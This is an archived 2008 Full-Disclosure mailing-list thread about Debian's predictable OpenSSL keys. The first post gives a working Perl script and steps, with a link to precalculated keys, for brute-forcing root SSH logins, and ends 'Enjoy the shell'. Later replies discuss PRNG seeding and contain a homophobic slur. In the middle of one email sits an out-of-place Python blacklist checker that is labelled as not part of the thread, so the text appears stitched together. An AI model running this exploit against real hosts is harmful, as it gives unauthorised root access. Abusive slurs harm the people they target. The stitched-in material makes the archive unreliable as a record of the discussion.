
Mailing List Archive: Full Disclosure: Full-Disclosure

Working exploit for Debian generated SSH Keys


mm at deadbeef

May 14, 2008, 11:35 PM

Post #1 of 14 (1520 views)
Working exploit for Debian generated SSH Keys

Hi full-disclosure,

The Debian OpenSSL issue means that there are only 65,536 possible SSH
keys generated, because the only entropy is the PID of the process
generating the key.

This means that the following Perl script can be used with the
precalculated SSH keys to brute-force the SSH login. It works if such a
key is installed on a non-patched Debian or any other system manually
configured to.

On an unpatched system, which doesn't need to be debian, do the following:

1. Download http://www.deadbeef.de/rsa.2048.tar.bzip2

2. Extract it to a directory

3. Add to /root/.ssh/authorized_keys an SSH RSA key with 2048
bits, generated on an unpatched Debian (this is the key this exploit will
break)

4. Run the Perl script and give it the location where you extracted
the bzip2 archive mentioned above.

#!/usr/bin/perl
use strict;
use warnings;

# Number of private keys offered per SSH connection. sshd's default
# MaxAuthTries is 6, so offering more than that per connection is refused.
my $keysPerConnect = 6;

unless ($ARGV[1]) {
    print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
    print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
    print "By mm[at]deadbeef.de\n";
    exit 0;
}

my @a;
chdir($ARGV[0]) || die("chdir: $!");
# After chdir the key directory is the working directory, so open "."
# (opening $ARGV[0] again would fail for a relative path).
opendir(A, ".") || die("opendir: $!");
while ($_ = readdir(A)) {
    # The precalculated keys are named by the PID that generated them,
    # so only purely numeric file names are candidates.
    next unless m,^\d+$,;
    push(@a, $_);
    # Try exactly $keysPerConnect identities on one connection.
    if (scalar(@a) >= $keysPerConnect) {
        system("echo " . join(" ", @a) . "; ssh -l root "
               . join(" ", map { "-i " . $_ } @a) . " " . $ARGV[1]);
        @a = ();
    }
}
closedir(A);

5. Enjoy the shell after some minutes (less than 20 minutes)

Regards,
Markus Mueller
mm[at]deadbeef.de

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


bobb.harley at gmail

May 18, 2008, 8:13 AM

Post #2 of 14 (1365 views)
Re: Working exploit for Debian generated SSH Keys [In reply to]

Anyone have a copy of
rsa.2048.tar.bzip2<http://www.deadbeef.de/rsa.2048.tar.bzip2>?
The web server isn't playing nicely ;-)

On Thu, May 15, 2008 at 2:35 AM, Markus Müller <mm[at]deadbeef.de> wrote:



fdiggle at gmail

May 18, 2008, 8:58 PM

Post #3 of 14 (1351 views)
Re: Working exploit for Debian generated SSH Keys [In reply to]

Yes Fredrick Diggle will get you a copy :)

On Sun, May 18, 2008 at 10:13 AM, bob harley <bobb.harley[at]gmail.com> wrote:
> Anyone have a copy of rsa.2048.tar.bzip2? The web server isn't playing
> nicely ;-)



reepex at gmail

May 18, 2008, 9:20 PM

Post #4 of 14 (1350 views)
Re: Working exploit for Debian generated SSH Keys [In reply to]

why don't you code it yourself instead of being a script kiddie faggot. and
don't use ";-)" to look cool when you beg for warez.

On Sun, May 18, 2008 at 10:13 AM, bob harley <bobb.harley[at]gmail.com> wrote:

> Anyone have a copy of rsa.2048.tar.bzip2<http://www.deadbeef.de/rsa.2048.tar.bzip2>?
> The web server isn't playing nicely ;-)


reepex at gmail

May 18, 2008, 9:32 PM

Post #5 of 14 (1340 views)
Re: Working exploit for Debian generated SSH Keys [In reply to]

Could you never write perl again please? Perl underground should take a shot
at your stuff but you are not worth it.

On Thu, May 15, 2008 at 1:35 AM, Markus Müller <mm[at]deadbeef.de> wrote:



rvdwesten at gmail

May 19, 2008, 3:37 AM

Post #6 of 14 (1337 views)
Re: Working exploit for Debian generated SSH Keys [In reply to]

Why reinvent the wheel?

On Mon, May 19, 2008 at 6:20 AM, reepex <reepex[at]gmail.com> wrote:
> why don't you code it yourself instead of being a script kiddie faggot. and
> don't use ";-)" to look cool when you beg for warez.



--
Ronald van der Westen



boklm at mars-attacks

May 19, 2008, 4:09 AM

Post #7 of 14 (1339 views)
Re: Working exploit for Debian generated SSH Keys [In reply to]

On Mon, 19 May 2008, Ronald van der Westen wrote:

> Why reinvent the wheel?

Why not ?



roryflyguy at googlemail

May 19, 2008, 4:50 AM

Post #8 of 14 (1312 views)
Re: Working exploit for Debian generated SSH Keys [In reply to]

>_>

#1: It can't be that hard to generate random numbers.
#2: It's hardly the wheel.
#3: Again, pointless arguments.

On 19 May 2008, at 12:09, nicolas vigier wrote:

> On Mon, 19 May 2008, Ronald van der Westen wrote:
>
>> Why reinvent the wheel?
>
> Why not ?
>



groffg at gmgdesign

May 19, 2008, 10:51 AM

Post #9 of 14 (1314 views)
Re: Working exploit for Debian generated SSH Keys [In reply to]

I think the "wheel" in this context refers to exploit code, not PRNG code.

Generating pseudo-random numbers isn't hard given a good API, but writing
that API is non-trivial (assuming you want high entropy/low
predictability). And, apparently, screwing up that API is also very easy.

- G



----- Original Message -----
From: "Skratz0r" <roryflyguy[at]googlemail.com>
To: "nicolas vigier" <boklm[at]mars-attacks.org>
Cc: <full-disclosure[at]lists.grok.org.uk>
Sent: Monday, May 19, 2008 7:50 AM
Subject: Re: [Full-disclosure] Working exploit for Debian generated SSH
Keys






tonnerre.lombard at sygroup

May 19, 2008, 11:51 PM

Post #10 of 14 (1291 views)
Re: Working exploit for Debian generated SSH Keys [In reply to]

Salut, Garrett,

On Mon, 19 May 2008 13:51:29 -0400, Garrett M. Groff wrote:
> Generating pseudo-random numbers isn't hard given a good API, but
> writing that API is non-trivial (assuming you want high entropy/low
> predictability). And, apparently, screwing up that API is also very
> easy.

Generating real pseudo-random streams is a hard problem which is way
more than what people can handle. Usually, PRNGs are composed of
various periodic elements which, in the end, all combined produce a
repeating stream of pseudo-random numbers. OpenSSL uses a modified MAC
for this as a state machine and extracts some state bits as random
stream on every access.

We're not debating the PRNG itself here but the _seed_. OpenSSL
supports various ways to influence the state of the PRNG at various
stages by XORing in new material; however, Debian chose to only support
pre-seeding with uninitialized memory and the Process ID. With the
elimination of the uninitialized memory as seed, the seed for the MAC
was entirely comprised by the PID.

So we're not debating a weakness in the PRNG here at all, which is a
_very_ delicate subject.

Tonnerre
--
SyGroup GmbH
Tonnerre Lombard
Solutions Systematiques
Güterstrasse 86, 4053 Basel
Tel: +41 61 333 80 33
Fax: +41 61 383 14 67
Web: www.sygroup.ch
tonnerre.lombard[at]sygroup.ch


groffg at gmgdesign

May 20, 2008, 5:49 AM

Post #11 of 14 (1273 views)
Re: Working exploit for Debian generated SSH Keys [In reply to]

Yep, agreed.

- G






Valdis.Kletnieks at vt

May 20, 2008, 8:51 AM

Post #12 of 14 (1289 views)
Re: Working exploit for Debian generated SSH Keys [In reply to]

On Mon, 19 May 2008 13:51:29 EDT, "Garrett M. Groff" said:

> Generating pseudo-random numbers isn't hard given a good API, but writing
> that API is non-trivial (assuming you want high entropy/low
> predictability). And, apparently, screwing up that API is also very easy.

Of course, if you're trying to write a PoC, you don't need to know how to
code the API - all you need to do is grab the source for the key-tester that
got shipped as part of the OpenSSH patch and snarf out the nicely enumerated
list of all vulnerable keys, and use that list as the brute-forcer, 6 per
connection attempt. ;)
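A defender-side version of the check Valdis describes, added here as an example and not code from this thread or from the OpenSSH patch: it parses an authorized_keys file, computes each key's MD5 fingerprint from the RFC 4251 wire blob, and looks the fingerprint up in a blacklist of enumerated weak keys. The convention that the blacklist stores the last 20 hex digits of the fingerprint is an assumption, and the keys and blacklist entries below are constructed toys, not real Debian-generated keys.

```python
import base64
import hashlib
import struct


def _ssh_string(data: bytes) -> bytes:
    """SSH wire 'string': 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


def _ssh_mpint(n: int) -> bytes:
    """SSH wire 'mpint' (RFC 4251): two's-complement big-endian, length-prefixed."""
    raw = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    if raw and raw[0] & 0x80:
        raw = b"\x00" + raw  # keep a positive number positive
    return _ssh_string(raw)


def rsa_public_blob(e: int, n: int) -> bytes:
    """The blob an 'ssh-rsa' authorized_keys entry carries base64-encoded."""
    return _ssh_string(b"ssh-rsa") + _ssh_mpint(e) + _ssh_mpint(n)


def md5_fingerprint(blob: bytes) -> str:
    """Hex MD5 of the key blob (what ssh-keygen -l printed, minus the colons)."""
    return hashlib.md5(blob).hexdigest()


def blacklist_suffix(blob: bytes) -> str:
    """Assumption: the blacklist stores the last 20 hex digits of the fingerprint."""
    return md5_fingerprint(blob)[12:]


def parse_authorized_keys(text: str):
    """Yield (keytype, blob, comment) per key line, skipping comments and any
    leading options field such as command="..." or from="..."."""
    for line in text.splitlines():
        fields = line.strip().split()
        if not fields or fields[0].startswith("#"):
            continue
        for i in range(len(fields) - 1):
            if fields[i] in ("ssh-rsa", "ssh-dss"):
                try:
                    blob = base64.b64decode(fields[i + 1], validate=True)
                except ValueError:
                    break  # malformed line: skip it rather than guess
                yield fields[i], blob, " ".join(fields[i + 2:])
                break


def find_blacklisted(text: str, blacklist: set) -> list:
    """Comments (or key types) of keys whose fingerprint suffix is blacklisted."""
    return [comment or keytype
            for keytype, blob, comment in parse_authorized_keys(text)
            if blacklist_suffix(blob) in blacklist]


# Constructed sample data: toy moduli, NOT real keys and NOT the real blacklist.
WEAK_BLOB = rsa_public_blob(65537, 0xC0FFEE12345678)
GOOD_BLOB = rsa_public_blob(65537, 0xFEEDFACECAFEBEEF)
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# constructed sample authorized_keys",
    "ssh-rsa " + base64.b64encode(WEAK_BLOB).decode() + " weak@debian-etch",
    'command="/usr/bin/backup" ssh-rsa '
    + base64.b64encode(GOOD_BLOB).decode() + " backup@host",
])
SAMPLE_BLACKLIST = {blacklist_suffix(WEAK_BLOB)}  # pretend WEAK_BLOB was enumerated

if __name__ == "__main__":
    for hit in find_blacklisted(SAMPLE_AUTHORIZED_KEYS, SAMPLE_BLACKLIST):
        print("blacklisted key:", hit)
```

Running it against a real authorized_keys only needs the real blacklist loaded into the set; the options-field handling matters because forced-command keys are exactly the ones people forget to rotate.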


michael.holstein at csuohio

May 20, 2008, 10:41 AM

Post #13 of 14 (1285 views)
Re: Working exploit for Debian generated SSH Keys [In reply to]

> Generating real pseudo-random streams is a hard problem which is way
> more than what people can handle. Usually, PRNGs are composed of
> various periodic elements which, in the end, all combined produce a
> repeating stream of pseudo-random numbers. OpenSSL uses a modified MAC
> for this as a state machine and extracts some state bits as random
> stream on every access.
>

Smoke Detector + Webcam = cheapo RNG

http://inventgeek.com/Projects/alpharad/overview.aspx

I know some highly secure operations (eg: web casinos, using Geiger
counters and background radiation) use a version of this for their RNGs,
and random.org does it with RF (radios listening to static) .. do
patches exist for OpenSSL to use hardware devices? (short of a hack to
take something like the above and pipe it to /dev/random, etc).

Cheers,

Michael Holstein
Cleveland State University



tonnerre.lombard at sygroup

May 23, 2008, 12:48 AM

Post #14 of 14 (1207 views)
Re: Working exploit for Debian generated SSH Keys [In reply to]

Salut, Michael,

On Tue, 20 May 2008 13:41:41 -0400, Michael Holstein wrote:
> Smoke Detector + Webcam = cheapo RNG

We were talking about PRNGs here, which are highly complex mathematical
constructs, not hardware RNGs, which are also slightly hairy though.
There are a couple of books on PRNG design, and even if you read them
you probably still need a couple of years to design a secure PRNG.

> I know some highly secure operations (eg: web casinos, using Geiger
> counters and background radiation) use a version of this for their
> RNGs, and random.org does it with RF (radios listening to static) ..
> do patches exist for OpenSSL to use hardware devices? (short of a
> hack to take something like the above and pipe it to /dev/random,
> etc).

OpenSSL would probably be slightly the wrong place to do this. The BSD
systems tend to have kernel drivers for various hardware random
sources, XORing them into each other to eliminate the problem with weak
random sources. You can then distill this through the /dev/random
device. OpenSSL needs a build flag to make use of this additional
random material then, I think they add a certain amount of random
material to their MD on each iteration.

Please note that even hardware random sources are of quite varying
quality. Like you said, a Geiger counter provides you with quite
high-quality random numbers since, to our knowledge, quantum effects
are rather hard to predict. You can also use hard disk seek times as a
RNG source, but the quality is rather poor in this case, and you should
only use it in addition to other sources.

Tonnerre
--
SyGroup GmbH
Tonnerre Lombard
Solutions Systematiques
Güterstrasse 86, 4053 Basel
Tel: +41 61 333 80 33
Fax: +41 61 383 14 67
Web: www.sygroup.ch
tonnerre.lombard[at]sygroup.ch
